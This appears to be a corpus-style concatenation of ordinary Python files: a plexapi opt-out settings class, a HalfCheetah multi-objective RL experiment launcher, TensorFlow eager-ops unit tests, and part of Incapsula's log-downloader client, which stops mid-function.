class AccountOptOut(PlexObject):
""" Represents a single AccountOptOut
'https://plex.tv/api/v2/user/{userUUID}/settings/opt_outs'
Attributes:
TAG (str): optOut
key (str): Online Media Source key
value (str): Online Media Source opt_in, opt_out, or opt_out_managed
"""
TAG = 'optOut'
CHOICES = {'opt_in', 'opt_out', 'opt_out_managed'}
def _loadData(self, data):
self.key = data.attrib.get('key')
self.value = data.attrib.get('value')
def _updateOptOut(self, option):
""" Sets the Online Media Sources option.
Parameters:
option (str): see CHOICES
Raises:
:exc:`~plexapi.exceptions.NotFound`: ``option`` str not found in CHOICES.
"""
if option not in self.CHOICES:
raise NotFound('%s not found in available choices: %s' % (option, self.CHOICES))
url = self._server.OPTOUTS % {'userUUID': self._server.uuid}
params = {'key': self.key, 'value': option}
self._server.query(url, method=self._server._session.post, params=params)
self.value = option # assume query successful and set the value to option
def optIn(self):
""" Sets the Online Media Source to "Enabled". """
self._updateOptOut('opt_in')
def optOut(self):
""" Sets the Online Media Source to "Disabled". """
self._updateOptOut('opt_out')
def optOutManaged(self):
""" Sets the Online Media Source to "Disabled for Managed Users".
Raises:
:exc:`~plexapi.exceptions.BadRequest`: When trying to opt out of music.
"""
if self.key == 'tv.plex.provider.music':
raise BadRequest('%s does not have the option to opt out managed users.' % self.key)
self._updateOptOut('opt_out_managed')
|
halfcheetah-v2.py | import os, sys, signal
import random
import numpy as np
from multiprocessing import Process, Queue, current_process, freeze_support
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--pgmorl', default=False, action='store_true')
parser.add_argument('--ra', default=False, action='store_true')
parser.add_argument('--pfa', default=False, action='store_true')
parser.add_argument('--moead', default=False, action='store_true')
parser.add_argument('--random', default=False, action='store_true')
parser.add_argument('--num-seeds', type=int, default=6)
parser.add_argument('--num-processes',
type=int,
default=1,
help='number of algorithms to be run in parallel (Note: each algorithm needs 4 * num-tasks processors by default, so the total number of processors is 4 * num-tasks * num-processes.)')
parser.add_argument('--save-dir', type=str, default='./results/HalfCheetah-v2')
args = parser.parse_args()
random.seed(2000)
commands = []
save_dir = args.save_dir
test_pgmorl = args.pgmorl
test_ra = args.ra
test_random = args.random
test_pfa = args.pfa
test_moead = args.moead
for i in range(args.num_seeds):
seed = random.randint(0, 1000000)
if test_pgmorl:
cmd = 'python morl/run.py '\
'--env-name MO-HalfCheetah-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method prediction-guided '\
'--num-weight-candidates 7 '\
'--num-tasks 6 '\
'--sparsity 1.0 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pgmorl/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_ra:
cmd = 'python morl/run.py '\
'--env-name MO-HalfCheetah-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method ra '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/ra/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_random:
cmd = 'python morl/run.py '\
'--env-name MO-HalfCheetah-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method random '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/random/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_pfa:
cmd = 'python morl/run.py '\
'--env-name MO-HalfCheetah-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method pfa '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pfa/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_moead:
cmd = 'python morl/run.py '\
'--env-name MO-HalfCheetah-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method moead '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/moead/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
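# Each worker below runs shell commands from task_queue until it reads the
# 'STOP' sentinel or a command exits non-zero (reporting 'killed'); it always
# puts 'done' on done_queue when it finishes.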
def worker(input, output):
for cmd in iter(input.get, 'STOP'):
ret_code = os.system(cmd)
if ret_code != 0:
output.put('killed')
break
output.put('done')
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for cmd in commands:
task_queue.put(cmd)
# Submit stop signals
for i in range(args.num_processes):
task_queue.put('STOP')
# Start worker processes
for i in range(args.num_processes):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
for i in range(args.num_processes):
print(f'Process {i}', done_queue.get())
|
ops_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for operations in eager execution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import weakref
from absl.testing import parameterized
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.eager import execute
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import sparse_ops
class OpsTest(test_util.TensorFlowTestCase, parameterized.TestCase):
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = math_ops.matmul(three, five)
self.assertEqual([[15.0]], product.numpy())
def testExecuteStringAttr(self):
three = constant_op.constant(3.0)
checked_three = array_ops.check_numerics(three,
message='just checking')
self.assertEqual([[3]], checked_three.numpy())
def testExecuteFloatAttr(self):
three = constant_op.constant(3.0)
almost_three = constant_op.constant(2.8)
almost_equal = math_ops.approximate_equal(
three, almost_three, tolerance=0.3)
self.assertTrue(almost_equal)
def testExecuteIntAttr(self):
three = constant_op.constant(3)
four = constant_op.constant(4)
total = math_ops.add_n([three, four])
self.assertAllEqual(7, total)
def testExecuteBoolAttr(self):
three = constant_op.constant([[3]])
five = constant_op.constant([[5]])
product = math_ops.matmul(three, five, transpose_a=True)
self.assertAllEqual([[15]], product)
def testExecuteOneListOutput(self):
split_dim = constant_op.constant(1)
value = constant_op.constant([[0, 1, 2], [3, 4, 5]])
x1, x2, x3 = array_ops.split(value, 3, axis=split_dim)
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testGraphMode(self):
graph = ops.Graph()
with graph.as_default(), context.graph_mode():
array_ops.placeholder(dtypes.int32)
self.assertLen(graph.get_operations(), 1)
# See comments on handling of int32 tensors on GPU in
# EagerTensor.__init__.
@test_util.run_gpu_only
def testInt32CPUDefault(self):
with context.device('/gpu:0'):
r = constant_op.constant(1) + constant_op.constant(2)
self.assertAllEqual(r, 3)
def testExecuteListOutputLen1(self):
split_dim = constant_op.constant(1)
value = constant_op.constant([[0, 1, 2], [3, 4, 5]])
result = array_ops.split(value, 1, axis=split_dim)
self.assertIsInstance(result, list)
self.assertLen(result, 1)
self.assertAllEqual([[0, 1, 2], [3, 4, 5]], result[0])
def testExecuteListOutputLen0(self):
empty = constant_op.constant([], dtype=dtypes.int32)
result = array_ops.unstack(empty, 0)
self.assertIsInstance(result, list)
self.assertEmpty(result)
def testExecuteMultipleNonListOutput(self):
x = constant_op.constant([1, 2, 3, 4, 5, 6])
y = constant_op.constant([1, 3, 5])
result = array_ops.listdiff(x, y)
out, idx = result
self.assertIs(out, result.out)
self.assertIs(idx, result.idx)
self.assertAllEqual([2, 4, 6], out)
self.assertAllEqual([1, 3, 5], idx)
def testExecuteMultipleListOutput(self):
split_dim = constant_op.constant(1, dtype=dtypes.int64)
indices = constant_op.constant([[0, 2], [0, 4], [0, 5], [1, 0], [1, 1]],
dtype=dtypes.int64)
values = constant_op.constant([2, 3, 5, 7, 11])
shape = constant_op.constant([2, 7], dtype=dtypes.int64)
result = sparse_ops.gen_sparse_ops.sparse_split(
split_dim,
indices,
values,
shape,
num_split=2)
output_indices, output_values, output_shape = result
self.assertLen(output_indices, 2)
self.assertLen(output_values, 2)
self.assertLen(output_shape, 2)
self.assertEqual(output_indices, result.output_indices)
self.assertEqual(output_values, result.output_values)
self.assertEqual(output_shape, result.output_shape)
self.assertAllEqual([[0, 2], [1, 0], [1, 1]], output_indices[0])
self.assertAllEqual([[0, 0], [0, 1]], output_indices[1])
self.assertAllEqual([2, 7, 11], output_values[0])
self.assertAllEqual([3, 5], output_values[1])
self.assertAllEqual([2, 4], output_shape[0])
self.assertAllEqual([2, 3], output_shape[1])
# TODO(josh11b): Test an op that has multiple outputs, some but not
# all of which are lists. Examples: barrier_take_many (currently
# unsupported since it uses a type list) or sdca_optimizer (I don't
# have an example of legal inputs & outputs).
def testComposition(self):
x = constant_op.constant(1, dtype=dtypes.int32)
three_x = x + x + x
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
def testOperatorOverrides(self):
def ops_test(v1, v2):
a = constant_op.constant(v1)
b = constant_op.constant(v2)
self.assertAllEqual((-a), np.negative(v1))
self.assertAllEqual(abs(b), np.absolute(v2))
self.assertAllEqual((a + b), np.add(v1, v2))
self.assertAllEqual((a - b), np.subtract(v1, v2))
self.assertAllEqual((a * b), np.multiply(v1, v2))
self.assertAllEqual((a * a), np.multiply(v1, v1))
if all(x >= 0 for x in v2):
self.assertAllEqual((a**b), np.power(v1, v2))
self.assertAllEqual((a / b), np.true_divide(v1, v2))
self.assertAllEqual((a / a), np.true_divide(v1, v1))
self.assertAllEqual((a % b), np.mod(v1, v2))
self.assertAllEqual((a < b), np.less(v1, v2))
self.assertAllEqual((a <= b), np.less_equal(v1, v2))
self.assertAllEqual((a > b), np.greater(v1, v2))
self.assertAllEqual((a >= b), np.greater_equal(v1, v2))
# TODO(b/120678848): Remove the else branch once we enable
# ops.Tensor._USE_EQUALITY by default.
if ops.Tensor._USE_EQUALITY:
self.assertAllEqual((a == b), np.equal(v1, v2))
self.assertAllEqual((a != b), np.not_equal(v1, v2))
else:
self.assertAllEqual((a == b), np.equal(v1, v2)[0])
self.assertAllEqual((a != b), np.not_equal(v1, v2)[0])
self.assertAllEqual(v1[0], a[constant_op.constant(0)])
ops_test([1, 4, 8], [2, 3, 5])
ops_test([1, -4, -5], [-2, 3, -6])
def test_basic_slice(self):
npt = np.arange(1, 19, dtype=np.float32).reshape(3, 2, 3)
t = constant_op.constant(npt)
self.assertAllEqual(npt[:, :, :], t[:, :, :])
self.assertAllEqual(npt[::, ::, ::], t[::, ::, ::])
self.assertAllEqual(npt[::1, ::1, ::1], t[::1, ::1, ::1])
self.assertAllEqual(npt[::1, ::5, ::2], t[::1, ::5, ::2])
self.assertAllEqual(npt[::-1, :, :], t[::-1, :, :])
self.assertAllEqual(npt[:, ::-1, :], t[:, ::-1, :])
self.assertAllEqual(npt[:, :, ::-1], t[:, :, ::-1])
self.assertAllEqual(npt[-2::-1, :, ::1], t[-2::-1, :, ::1])
self.assertAllEqual(npt[-2::-1, :, ::2], t[-2::-1, :, ::2])
def testDegenerateSlices(self):
npt = np.arange(1, 19, dtype=np.float32).reshape(3, 2, 3)
t = constant_op.constant(npt)
# degenerate by offering a forward interval with a negative stride
self.assertAllEqual(npt[0:-1:-1, :, :], t[0:-1:-1, :, :])
# degenerate with a reverse interval with a positive stride
self.assertAllEqual(npt[-1:0, :, :], t[-1:0, :, :])
# empty interval in every dimension
self.assertAllEqual(npt[-1:0, 2:2, 2:3:-1], t[-1:0, 2:2, 2:3:-1])
def testEllipsis(self):
npt = np.array(
[[[[[1, 2], [3, 4], [5, 6]]], [[[7, 8], [9, 10], [11, 12]]]]])
t = constant_op.constant(npt)
self.assertAllEqual(npt[0:], t[0:])
# implicit ellipsis
self.assertAllEqual(npt[0:, ...], t[0:, ...])
# ellipsis alone
self.assertAllEqual(npt[...], t[...])
# ellipsis at end
self.assertAllEqual(npt[0:1, ...], t[0:1, ...])
# ellipsis at begin
self.assertAllEqual(npt[..., 0:1], t[..., 0:1])
# ellipsis at middle
self.assertAllEqual(npt[0:1, ..., 0:1], t[0:1, ..., 0:1])
def testShrink(self):
npt = np.array([[[[[1, 2, 4, 5], [5, 6, 7, 8], [9, 10, 11, 12]]],
[[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]]]]])
t = constant_op.constant(npt)
self.assertAllEqual(npt[:, :, :, :, 3], t[:, :, :, :, 3])
self.assertAllEqual(npt[..., 3], t[..., 3])
self.assertAllEqual(npt[:, 0], t[:, 0])
self.assertAllEqual(npt[:, :, 0], t[:, :, 0])
@test_util.run_gpu_only
def testOpWithInputsOnDifferentDevices(self):
# The GPU kernel for the Reshape op requires that the
# shape input be on CPU.
value = constant_op.constant([1., 2.]).gpu()
shape = constant_op.constant([2, 1])
reshaped = array_ops.reshape(value, shape)
self.assertAllEqual([[1], [2]], reshaped.cpu())
def testInt64(self):
# Fill requires the first input to be an int32 tensor.
self.assertAllEqual(
[1.0, 1.0],
array_ops.fill(constant_op.constant([2], dtype=dtypes.int64),
constant_op.constant(1)))
@test_util.run_gpu_only
def testOutputOnHostMemory(self):
# The Shape op kernel on GPU places the output in host memory.
value = constant_op.constant([1.]).gpu()
shape = array_ops.shape(value)
self.assertEqual([1], shape.numpy())
@test_util.run_gpu_only
def testSilentCopy(self):
# Temporarily replace the context
# pylint: disable=protected-access
old_context = context.context()
context._set_context(context.Context())
try:
config.set_device_policy('silent')
cpu_tensor = constant_op.constant(1.0)
gpu_tensor = cpu_tensor.gpu()
self.assertAllEqual(cpu_tensor + gpu_tensor, 2.0)
finally:
context._set_context(old_context)
# pylint: enable=protected-access
@test_util.run_gpu_only
def testSoftPlacement(self):
# Temporarily replace the context
# pylint: disable=protected-access
old_context = context.context()
context._set_context(context.Context())
try:
config.set_device_policy('silent')
config.set_soft_device_placement(True)
cpu_tensor = constant_op.constant(1.0)
result = cpu_tensor + cpu_tensor
self.assertEqual(result.device,
'/job:localhost/replica:0/task:0/device:GPU:0')
finally:
context._set_context(old_context)
# pylint: enable=protected-access
def testRandomUniform(self):
scalar_shape = constant_op.constant([], dtype=dtypes.int32)
x = random_ops.random_uniform(scalar_shape)
self.assertEqual(0, x.shape.ndims)
self.assertEqual(dtypes.float32, x.dtype)
x = random_ops.random_uniform(
scalar_shape, minval=constant_op.constant(5.),
maxval=constant_op.constant(6.))
self.assertLess(x, 6)
self.assertGreaterEqual(x, 5)
def testArgsToMatchingEagerDefault(self):
# Uses default
ctx = context.context()
allowed_dtypes = [dtypes.int32, dtypes.int64]
# Follows standard int conversion rules
t, r = execute.args_to_matching_eager([[3, 4]], ctx, allowed_dtypes,
dtypes.int32)
self.assertEqual(t, dtypes.int32)
self.assertEqual(r[0].dtype, dtypes.int32)
t, r = execute.args_to_matching_eager([[3, 4]], ctx, allowed_dtypes,
dtypes.int64)
self.assertEqual(t, dtypes.int32)
self.assertEqual(r[0].dtype, dtypes.int32)
# Use int64 since it is a better fit
t, r = execute.args_to_matching_eager([[2**48]], ctx, allowed_dtypes,
dtypes.int32)
self.assertEqual(t, dtypes.int64)
self.assertEqual(r[0].dtype, dtypes.int64)
# When the regular tensor conversion fails, then use the default type as a
# hint.
allowed_dtypes = [dtypes.uint32, dtypes.uint64]
t, r = execute.args_to_matching_eager([[3, 4]], ctx, allowed_dtypes,
dtypes.uint32)
self.assertEqual(t, dtypes.uint32)
self.assertEqual(r[0].dtype, dtypes.uint32)
t, r = execute.args_to_matching_eager([[3, 4]], ctx, allowed_dtypes,
dtypes.uint64)
self.assertEqual(t, dtypes.uint64)
self.assertEqual(r[0].dtype, dtypes.uint64)
t, r = execute.args_to_matching_eager([], ctx, allowed_dtypes, dtypes.int64)
self.assertEqual(t, dtypes.int64)
# Doesn't use default
allowed_dtypes = [dtypes.int32, dtypes.string]
t, r = execute.args_to_matching_eager([['string', 'arg']], ctx,
allowed_dtypes, dtypes.int32)
self.assertEqual(t, dtypes.string)
self.assertEqual(r[0].dtype, dtypes.string)
def testFlattenLayer(self):
flatten_layer = core.Flatten()
x = constant_op.constant([[[-10, -20], [-30, -40]], [[10, 20], [30, 40]]])
y = flatten_layer(x)
self.assertAllEqual([[-10, -20, -30, -40], [10, 20, 30, 40]], y)
def testIdentity(self):
self.assertAllEqual(2, array_ops.identity(2))
@test_util.run_gpu_only
def testIdentityOnVariable(self):
with context.device('/gpu:0'):
v = resource_variable_ops.ResourceVariable(True)
self.assertAllEqual(True, array_ops.identity(v))
def testIncompatibleSetShape(self):
x = constant_op.constant(1)
with self.assertRaises(ValueError):
x.set_shape((1, 2))
def testCompatibleSetShape(self):
x = constant_op.constant([[1, 2]])
x.set_shape(tensor_shape.TensorShape([None, 2]))
self.assertEqual(x.get_shape(), (1, 2))
@parameterized.named_parameters(
('Tensor', lambda: constant_op.constant(1.3+1j)),
('Variable', lambda: resource_variable_ops.ResourceVariable(1.3+1j)))
def testCastToPrimitiveTypesFrom(self, value_fn):
x = value_fn()
self.assertIsInstance(int(x), int)
self.assertEqual(int(x), 1)
self.assertIsInstance(float(x), float)
self.assertAllClose(float(x), 1.3)
self.assertIsInstance(complex(x), complex)
self.assertAllClose(complex(x), 1.3+1j)
def testCastNonScalarToPrimitiveTypesFails(self):
x = constant_op.constant([1.3, 2])
with self.assertRaises(TypeError):
int(x)
with self.assertRaises(TypeError):
float(x)
def testRange(self):
x = constant_op.constant(2)
self.assertEqual([0, 1], list(range(x)))
def testFormatString(self):
x = constant_op.constant(3.1415)
self.assertEqual('3.14', '{:.2f}'.format(x))
def testNoOpIsNone(self):
self.assertIsNone(control_flow_ops.no_op())
def testEagerContextPreservedAcrossThreads(self):
def init_fn():
self.assertTrue(context.executing_eagerly())
with ops.init_scope():
self.assertTrue(context.executing_eagerly())
context_switches = context.context().context_switches
self.assertLen(context_switches.stack, 1)
self.assertFalse(context_switches.stack[0].is_building_function)
self.assertEqual(context_switches.stack[0].enter_context_fn,
context.eager_mode)
self.assertTrue(context.executing_eagerly())
t1 = threading.Thread(target=init_fn)
t1.start()
t1.join()
def testWeakrefEagerTensor(self):
x = constant_op.constant([[1.]])
x.at1 = constant_op.constant([[2.]])
x.at2 = 3.
weak_x = weakref.ref(x)
weak_xat1 = weakref.ref(x.at1)
del x
self.assertIs(weak_x(), None)
self.assertIs(weak_xat1(), None)
def testWeakKeyDictionaryTensor(self):
weak_key_dict = weakref.WeakKeyDictionary()
strong_x = constant_op.constant([[1.]])
strong_y = constant_op.constant([[2.]])
strong_x_ref = strong_x.ref()
strong_y_ref = strong_y.ref()
weak_key_dict[strong_x_ref] = constant_op.constant([[3.]])
weak_key_dict[strong_y_ref] = constant_op.constant([[4.]])
strong_y.a = constant_op.constant([[5.]])
weak_x_ref = weakref.ref(strong_x)
del strong_x, strong_x_ref
self.assertIs(weak_x_ref(), None)
self.assertEqual([strong_y_ref], list(weak_key_dict))
self.assertLen(list(weak_key_dict), 1)
self.assertLen(weak_key_dict, 1)
del strong_y, strong_y_ref
self.assertEqual([], list(weak_key_dict))
def testEagerTensorsCanBeGarbageCollected(self):
x = constant_op.constant([[1.]])
y = constant_op.constant([[2.]])
x.y = y
y.x = x
weak_x = weakref.ref(x)
weak_y = weakref.ref(y)
del x
del y
gc.collect()
self.assertIs(weak_x(), None)
self.assertIs(weak_y(), None)
@test_util.disable_tfrt('TFE_ContextGetExecutorForThread not implemented '
'b/156188669')
def testAsyncExceptionStackTrace(self):
config.set_synchronous_execution(False)
def exception_originated_from_here():
# Invalid shapes for matmul.
return math_ops.matmul([[1]], [[2], [3]])
# In sync mode, an exception would have been raised here but since this is
# in async, the exception will be raised next.
x = exception_originated_from_here()
with self.assertRaisesRegex(errors_impl.InvalidArgumentError,
'in exception_originated_from_here'):
x.numpy()
context.async_clear_error()
config.set_synchronous_execution(True)
def testCrossContextTensorCache(self):
old_context = context.context()
old_x = constant_op.constant(9.5)
context._set_context(context.Context())
try:
new_x = constant_op.constant(9.5)
self.assertEqual(new_x.numpy(), 9.5)
finally:
context._set_context(old_context)
self.assertEqual(old_x.numpy(), 9.5)
if __name__ == '__main__':
test.main()
|
LogsDownloader.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Doron Lehmann, Incapsula, Inc.
# Date: 2015
# Description: Logs Downloader Client
#
# ************************************************************************************
# Copyright (c) 2015, Incapsula, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# ************************************************************************************
#
import configparser
import base64
import getopt
import hashlib
import logging
import os
import platform
import re
import signal
import sys
import threading
import time
import traceback
import ssl
import urllib3
import zlib
from logging import handlers
import socket
import M2Crypto
from Crypto.Cipher import AES
"""
Main class for downloading log files
"""
class LogsDownloader:
# the LogsDownloader will run until external termination
running = True
def __init__(self, config_path, system_log_path, log_level):
# set a log file for the downloader
self.logger = logging.getLogger("logsDownloader")
# default log directory for the downloader
log_dir = system_log_path
# create the log directory if needed
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# keep logs history for 7 days
file_handler = logging.handlers.TimedRotatingFileHandler(os.path.join(log_dir, "logs_downloader.log"), when='midnight', backupCount=7)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
file_handler.setFormatter(formatter)
self.logger.addHandler(file_handler)
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
self.logger.addHandler(console_handler)
if log_level == "DEBUG":
self.logger.setLevel(logging.DEBUG)
elif log_level == "INFO":
self.logger.setLevel(logging.INFO)
elif log_level == "ERROR":
self.logger.setLevel(logging.ERROR)
self.logger.debug("Initializing LogsDownloader")
self.config_path = config_path
self.config_reader = Config(self.config_path, self.logger)
try:
# read the configuration file and load it
self.config = self.config_reader.read()
except Exception:
self.logger.error("Exception while getting LogsDownloader config file - Could Not find Configuration file - %s", traceback.format_exc())
sys.exit("Could Not find Configuration file")
# create a file downloader handler
self.file_downloader = FileDownloader(self.config, self.logger)
# create a last file id handler
self.last_known_downloaded_file_id = LastFileId(self.config_path)
# create a logs file index handler
self.logs_file_index = LogsFileIndex(self.config, self.logger, self.file_downloader)
# create log folder if needed for storing downloaded logs
if self.config.SAVE_LOCALLY == "YES":
if not os.path.exists(self.config.PROCESS_DIR):
os.makedirs(self.config.PROCESS_DIR)
self.logger.info("LogsDownloader initializing is done")
"""
Download the log files.
If this is the first time, we get the logs.index file, scan it, and download all of the files in it.
If this is not the first time, we try to fetch the next log file.
"""
def get_log_files(self):
retries = 0
while self.running:
# check what is the last log file that we downloaded
last_log_id = self.last_known_downloaded_file_id.get_last_log_id()
# if there is no last downloaded file
if last_log_id == "":
self.logger.info("No last downloaded file is found - downloading index file and starting to download all the log files in it")
try:
# download the logs.index file
self.logs_file_index.download()
# scan it and download all of the files in it
self.first_time_scan()
except Exception as e:
self.logger.error("Failed to downloading index file and starting to download all the log files in it - %s, %s", e, traceback.format_exc())
# wait for 30 seconds between each iteration
self.logger.info("Sleeping for 30 seconds before trying to fetch logs again...")
time.sleep(30)
continue
# there is a last downloaded log file id
else:
self.logger.debug("The last known downloaded file is %s", last_log_id)
# get the next log file name that we should download
next_file = self.last_known_downloaded_file_id.get_next_file_name()
self.logger.debug("Will now try to download %s", next_file)
try:
# download and handle the next log file
success = self.handle_file(next_file)
# if we successfully handled the next log file
if success:
self.logger.debug("Successfully handled file %s, updating the last known downloaded file id", next_file)
# set the last handled log file information
self.last_known_downloaded_file_id.move_to_next_file()
if self.running:
self.logger.info("Sleeping for 2 seconds before fetching the next logs file")
retries = 0
time.sleep(2)
# we failed to handle the next log file
else:
self.logger.info("Could not get log file %s. It could be that the log file does not exist yet.", next_file)
if self.running:
if retries >= 10:
self.logger.info("Failed to download file 10 times, trying to recover.")
# download the logs.index file
self.logs_file_index.download()
logs_in_index = self.logs_file_index.indexed_logs()
log_id = self.get_counter_from_file_name(next_file)
first_log_id_in_index = self.get_counter_from_file_name(logs_in_index[0])
if log_id < first_log_id_in_index:
self.logger.error("Current downloaded file is not in the index file any more. This is probably due to a long delay in downloading. Attempting to recover")
self.last_known_downloaded_file_id.remove_last_log_id()
elif self.last_known_downloaded_file_id.get_next_file_name(skip_files=1) in logs_in_index:
self.logger.warning("Skipping " + next_file)
self.last_known_downloaded_file_id.move_to_next_file()
else:
self.logger.info("Next file still does not exist. Sleeping for 30 seconds and continuing normally")
retries = 0
time.sleep(30)
else:
# wait for 30 seconds between each iteration
self.logger.info("Sleeping for 30 seconds before trying to fetch logs again...")
retries += 1
time.sleep(30)
except Exception as e:
self.logger.error("Failed to download file %s. Error is - %s , %s", next_file, e, traceback.format_exc())
"""
Scan the logs.index file, and download all the log files in it
"""
def first_time_scan(self):
self.logger.info("No last index found, will now scan the entire index...")
# get the list of file names from the index file
logs_in_index = self.logs_file_index.indexed_logs()
# for each file
for log_file_name in logs_in_index:
if self.running:
if LogsFileIndex.validate_log_file_format(str(log_file_name.rstrip('\r\n'))):
# download and handle the log file
success = self.handle_file(log_file_name)
# if we successfully handled the log file
if success:
# set the last handled log file information
self.last_known_downloaded_file_id.update_last_log_id(log_file_name)
else:
# skip the file and try to get the next one
self.logger.warning("Skipping File %s", log_file_name)
self.logger.info("Completed fetching all the files from the logs files index file")
"""
Download a log file, decrypt, unzip, and store it
"""
def handle_file(self, logfile, wait_time=5):
# we will try to get the file, retrying up to 3 times on failure
counter = 0
while counter <= 3:
if self.running:
# download the file
result = self.download_log_file(logfile)
# if we got it
if result[0] == "OK":
try:
# we decrypt the file
decrypted_file = self.decrypt_file(result[1], logfile)
# handle the decrypted content
self.handle_log_decrypted_content(logfile, decrypted_file)
self.logger.info("File %s download and processing completed successfully", logfile)
return True
# if an exception occurs during the decryption or handling the decrypted content,
# we save the raw file to a "fail" folder
except Exception as e:
self.logger.info("Saving file %s locally to the 'fail' folder %s %s", logfile, e, traceback.format_exc())
fail_dir = os.path.join(self.config.PROCESS_DIR, 'fail')
if not os.path.exists(fail_dir):
os.mkdir(fail_dir)
with open(os.path.join(fail_dir, logfile), "wb") as file:  # the raw content is bytes
file.write(result[1])
self.logger.info("Saved file %s locally to the 'fail' folder", logfile)
break
# if the file was not found (it may not have been generated yet) or an error occurred
elif result[0] == "NOT_FOUND" or result[0] == "ERROR":
# we increase the retry counter
counter += 1
# if we want to sleep between retries
if wait_time > 0 and counter <= 3:
if self.running:
self.logger.info("Sleeping for %s seconds until next file download retry number %s out of 3", wait_time, counter)
time.sleep(wait_time)
# if the downloader was stopped
else:
return False
# if we didn't succeed to download the file
return False
"""
Saves the decrypted file content to a log file in the filesystem
"""
def handle_log_decrypted_content(self, filename, decrypted_file):
